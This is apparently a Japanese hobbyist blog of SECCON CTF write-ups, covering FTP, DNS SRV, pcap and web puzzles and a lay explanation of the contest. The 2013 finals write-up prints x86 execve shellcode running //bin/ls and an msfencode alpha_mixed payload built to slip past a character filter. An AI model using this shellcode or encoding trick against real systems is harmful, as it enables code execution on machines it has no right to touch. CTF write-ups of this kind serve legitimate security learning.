2014-12-07

SECCON2014 オンライン予選（en） nw300 Get from curious "FTP" server

FTPサーバ。
でもftpコマンドでうまくいかず。

なんとなく普通の挙動はしてない気がしたのでTelnetで接続。
telnet ftpsv.quals.seccon.jp 21

もちろん裏ではwireshark

ログインはanonymous
とりあえず、普通使えるであろう LIST NIST ls が使えない。

どうすっかと思いつつ HELP を実行すると、RFC嫁と言われる。
http://hp.vector.co.jp/authors/VA002682/rfc959j.htm

ザーッと眺めつつ、ACCTを実行したら、PASVモードになれとの応答。
（あるいはデータポート指定しろ、だったのだが、NATの内側なのでPASVに）

データポートを別窓で繋ぎつつ、
再度ACCTしたら、ファイル名が届いた。

FTP Data (-rw-r--r-- 1 0 0 38 Nov 29 04:43 key_is_in_this_file_afjoirefjort94dv7u.txt\r\n)

もうこの時点で勝利確定。

RETR key_is_in_this_file_afjoirefjort94dv7u.txt

でフラグ取得。

2014-12-07

SECCON2014 オンライン予選（en） nw200 Version2

srv h2o.pwn.seccon.jp.

DNSのSRVレコードだろうと目星をつけるが、なんのサービスなのかわからず悩む。

そこでh2oでググったら某海外ゲームが出てきた。でも古いしバージョン２も出る気配はないので除外。

ここでチームメイトに　もうすぐ出るバージョン２とH2Oからなに連想する？と聞いたところ
HTTP2のライブラリでH2Oというやつが在るということが判明。

とりあえずポート番号がわからない（80/443/8080いずれもNG）ので、
当初の発想に戻り、DNSでSRVレコードを引く。

HTTPポート　65080 （今回はつかわないけど）

dig _http._tcp.h2o.pwn.seccon.jp. SRV
; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> _http._tcp.h2o.pwn.seccon.jp. SRV
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 9449
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;_http._tcp.h2o.pwn.seccon.jp. IN SRV

;; ANSWER SECTION:
_http._tcp.h2o.pwn.seccon.jp. 5 IN SRV 1 1 65080 h2o.pwn.seccon.jp.
;; Query time: 35 msec
;; SERVER: 192.168.159.2#53(192.168.159.2)
;; WHEN: Sun Dec 7 09:26:33 2014
;; MSG SIZE rcvd: 83

HTTPSポート　65432 （本命）

dig _https._tcp.h2o.pwn.seccon.jp. SRV
; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> _https._tcp.h2o.pwn.seccon.jp. SRV
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12945
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;_https._tcp.h2o.pwn.seccon.jp. IN SRV

;; ANSWER SECTION:
_https._tcp.h2o.pwn.seccon.jp. 5 IN SRV 2 0 65432 h2o.pwn.seccon.jp.

;; Query time: 39 msec
;; SERVER: 192.168.159.2#53(192.168.159.2)
;; WHEN: Sun Dec 7 09:31:33 2014
;; MSG SIZE rcvd: 84

で、めでたくポート番号がわかったので、HTTP2を有効化したChromeにアクセス。

ヘッダの中にKey発見。

2014-12-07

SECCON2014 オンライン予選（en） nw100　GET the Key

定番のpcap解読。
今回はHTTP BASIC認証。
wiresharkなら勝手にAuthenticationヘッダをデコードしてくれるので瞬殺。

2014-03-08

SECCONを専門じゃない人に紹介してみる

ちょっと気分転換もかねて、難しいことをわかりやすく？話す練習。

SECCONとは

きっとSecurytyContestの略。ようはハッキングからみんなを守る人材を発掘するべく、競技会をやりましょう。っていう催しです。
総務省後援で、国内のいろんな企業もスポーンサーになっている（http://2013.seccon.jp/sponsor.html）かなり規模のでかいイベントです。
競技会がなんで人材発掘になるの？どんな競技なの？？ってのはこのあと。。。

競技について

とりあえず一言「ハッキング」と言ってましたが、もうちょい詳しく。。。
　
全国大会では、

「このパソコン好きにしていいから、以下の３つのことを達成しろ」

的な問題が（ヒントといっしょに）出ます。

といっても渡されるのはパソコン本体じゃなくネット上のアドレスなので、各チーム、ネット経由で攻略することになります。

そこで僕らは主に、以下の３つのことを目指します。

１）パソコン上隠された情報を盗み出す。
やり方はいろいろですが、パスワードで守られたページを無理やり開くとか、HPに公開してないファイルをダウンロードするとか、そういうことをやります。
僕達はそのパソコンを直接操作できないし、IDもパスワードも知らないので、ネット経由で何とか侵入して、ドロボーするのです。
ドロボーした情報の価値に応じて、ポイントが入ります。

２）自分たちの足跡を書き込む
普通おけない場所にファイルを置いたり、HPを書き換えたりして、「俺達このサーバー自由に操れるんだぜ」アピールをします。アピールするためには、ほんとに操れないといけないので、頑張って乗っ取ります。
足あとが残っていた時間と比例して得点が入りますが、他チームも足跡を残していたら、得点は折半です。

３）他のチームの邪魔をしろ
他のチームの足跡を消したり、自分たちが入ってきた穴（バグ）を修理してしまったり、果ては他チームの人がログインしてきた瞬間に無理やりログアウトさせたり、問題のパソコンの電源を落としたり（！）して、相手チームを妨害します。でも相手チームも邪魔してくるので、ここはもう戦争です。
（ここが一番競技っぽいですねｗ）
邪魔しても得点は入りませんが、他チームが１や２を達成できなくなる＆２で特典を折半せず独り占めできる　ので、結果的に順位が上がります。

一言でまとめると
「１番に乗っ取って、可能な限り他チームから守れ」
ですね。

攻撃も防御も両方できないと高得点が得られないので、なかなかシビアな競技です。

どうやって攻撃するの？
どうやって防御するの？

みたいな話は、ちょっとまだうまく説明できないので、おいおい。

2014-03-08

SECCON 2013 Final WriteUP（2.kaku and hanoi.tower）

できたことより出来なかった事のほうが多いけれど。。。

2.taku

つーてんかく。

問題把握まで

問題サーバ上で動いているプログラムの実行ファイルとソースコード、そして設定ファイルが渡される。

正直、最初何をすればよいのかわからなかった。
とりあえずソースを読む。
　
ざっと見、子プロを立ててその中で任意のコードを実行できるプログラムらしかった。
また、設定ファイルは確かxinedの設定がこんなだったはず（うろ覚え）

つまり、「サーバ上でこのプログラムが動いているから、任意のコードを実行してFlagをとってみろ。」ってことじゃね？と思い至る。

ここまでで1時間以上費やしている。
おそらく、他チームは初見でこの結論に至っていたのではないだろうか。
経験値不足が悔やまれる。

シェルコード調達

んで、とにかくシェルコードを用意して実行してみよう。という段階に。
実行ファイルが x86-ELFだったので、多分サーバもx86なんだろうと想像。
　
xinetdでうまく動かす自信がなかったので、ローカルで動くテストプログラムを書いて、動くであろうシェルコードの準備をした。

・・・つっても書いたんじゃなくてググったんですけどね。

スクリプトキディには辛いぜと思いながら、shellを実行するshellcode（なんか若いヤングマンみたいな表現ですいません）を入手、ローカルで実行に成功。

サーバに投げてみるが、プロンプトが返ってこない。
が、コピペで送ってるので原因解析なんてできるわけがない。

仕方ないので、１からまじめに勉強して徹夜で考えよう。と結論づけ、他の問題に着手。

この時点で日は傾きつつあり、諦めた直後に新問題が開放される。
（すでにチームはビリから2番め）

夜のお勉強

競技終了後、他のチームメンバーの助言も踏まえてシェルコードを自分で書いてみた。
といってもこれもかなりよそからのパクリなのだが。。。

global _start

section .text
_start:

; PUSH the first null dword
xor eax, eax
push eax

push 0x736c2f6e
push 0x69622f2f

mov ebx, esp ;ebx points to the //bin/ls

mov edx, eax ;mov 0 into eax

;create the arguments array argument for ls
push eax ;push 0 onto the stack
push 0x6c
push 0x6d74682f
push 0x7777772f
push 0x7261762f ;push -l onto the stack
mov esi,esp ;mov the address of the top of the stack into esi

;prepare the argurments array for execution
push eax
push esi ;address of where our arguments are
push ebx ;address of where //bin/ls is
mov ecx, esp
mov al, 11
int 0x80

あまり深く考えたわけではないが、shから別コマンドを呼ぼうとしていたことが行けなかったのではないかと考え、lsと、catを実行できるようなコードにした。
結果これは正しかった（子プロからのforkが禁止されていたので）

上記の通り、sysexecve (http://man7.org/linux/man-pages/man2/execve.2.html)にパスと引数を食わせて動かすプログラムを用意。
ここまでやって3時を回っていたので、2日目の思考力を保つために仮眠。
（自宅から会場が遠いので6時前に起きる必要があったのです）

stage0 攻略

朝イチ、昨夜書いたコードを投入。
見事最初のフラグの取得に成功。
とりあえずチーム内の人権は獲得したが、もはやチーム自体が最下位なので、チームごとミジンコレベルの存在になりつつあった。

stage1

次のステージ。
isalnumでシェルコードがフィルタされるので、英数しか使えない。
　
metasploitの msfencode コマンドを使えばできるらしいことは知っていた。
しかし使うのは初めて。使い方をググって調べてみたのだが、おかしい。

msfencode -e x86/alpha_mixed -b '\x00' -i ./lscode.bin -t c
[*] x86/alpha_mixed succeeded with size 130 (iteration=1)

unsigned char buf[] =
"\x89\xe6\xda\xc7\xd9\x76\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x70\x31\x59\x50\x70\x50\x65\x38\x50\x6e\x66\x4f\x72\x4c\x51"
"\x63\x61\x78\x36\x4f\x54\x6f\x32\x42\x35\x39\x6d\x59\x38\x63"
"\x6e\x69\x39\x52\x46\x30\x71\x78\x46\x4d\x30\x6c\x45\x50\x73"
"\x30\x6d\x59\x4b\x56\x72\x70\x53\x66\x63\x63\x6c\x49\x39\x71"
"\x78\x30\x66\x6b\x7a\x6d\x4d\x50\x41\x41";

どう見ても出力に英数字以外を含んでいる。
（最初の7バイト）

きっと使い方が違うか、オプションが間違っているのだろうと調べてみたものの、わからず時間切れ。

他チームのwrite-upを見ると

alpha_mixedエンコーダはシェルコードのアドレスが入ったレジスタを指定しないとシェルコードの全てが英数字にならない。
シェルコードへのアドレスがEAXに残っているので、
msf> set BufferRegister EAX
msf> generate -e x86/alpha_mixed

(team 0x0 http://labs.scaltinof.net/memo2/seccon2013-writeup より引用)

とのこと。
今あらためてググっても出てこない／(^o^)＼　
ツールとかは普段から使えるようになってないとダメってことですね。
　
さらには

Metasploitにできて俺にできないわけがない
て事で自分で書いた

（Team Epshiron Delta http://epsilondelta.hatenablog.jp/entry/2014/03/05/213632 よｒ引用）
　
もうかっこいいとしか言いようが無い。
書くのなんて最初から諦めたわけで、その時点で意識が違いすぎました。
　

のこりのstage

ちなみに、stage2は、アセンブラ短歌。
stage3は、他チームとの妨害合戦（フィルタに任意の値を指定可能）だったようで。
どのみち、スクリプトキディな私にはstage1を超えても次は超えられなかったように思えます。
　
結論　使えなきゃダメ。書けなきゃダメ。

hanoi

ハノイの塔。
WEB系は苦手なのだが、うまい具合にflagが1つとれてしまい担当に。

1つめのフラグ

ファイル内容を表示するphpがあったので、そのphpのソースコード自体を表示させてみた。
ファイルのアクセスキーがファイル名のMD5なのはチームメンバが初見で見破ってくれた。
ちなみにおれはMD5なんじゃねーのと思いつつ、末尾の改行文字を取り忘れてコケていた。アホ。
神様の確認結果：　cat -n "filename" | md5sum
アホの確認結果：　cat "filename" | md5sum

で、表示できるファイルが4つあることが判明。
4つ目のファイル（トップページを表示するphp）にキーワードが。
　

2つめのフラグどこだ

　
トップページの画像末尾に、dnsの問い合わせクエリが隠されていた。
オンライン予選と一緒じゃねーかと逆引きクエリを送ってみると
hanoi.
としか返ってこない。
ここで詰んだ。
　

実際の答え

　
公開された問題サーバは xxx.xxx.xxx.1
隠されていたDNSサーバは xxx.xxx.xxx.3
　
そして、stage2以降の問題は　xxx.xxx.xxx.2
にあったらしい。

1と3がある時点で、2もいることを想像するのがハッカーらしい。
うーん経験不足。

そこから先はファイルに情報隠している問題だったようで、うまく行けば解けた可能性もあり、とても悔しい。
　
相手を「標的ネットワーク」という立体的な存在ではなく、「問題サーバとDNS」という２点で捉えていたことが敗因だと思う。
実際何かしようと思ったら、ほかに脆弱なホストがないか探すのが筋なわけで、それができなかったのはもう反省しか無い。
現場力不足。
　
　
ちなみに、他メンバーが担当した korin についても同じことが言える。
反射型XSS自体は知識としてあったのに、それを使う発想に至れなかった。
懇親会で言われてやっちまったと思いました。

総論

前に感想を書いたけど、いい経験になりました。
本業がセキュリティじゃないので、防御も攻撃も現場ではほとんど経験することがなく、まだまだガッコのオベンキョれべるにとどまっているな〜ということを痛感させられました。
　
足りないことだらけですが、足りないことすら見えてなかった参加前よりは進歩したってことで、基礎から出直します。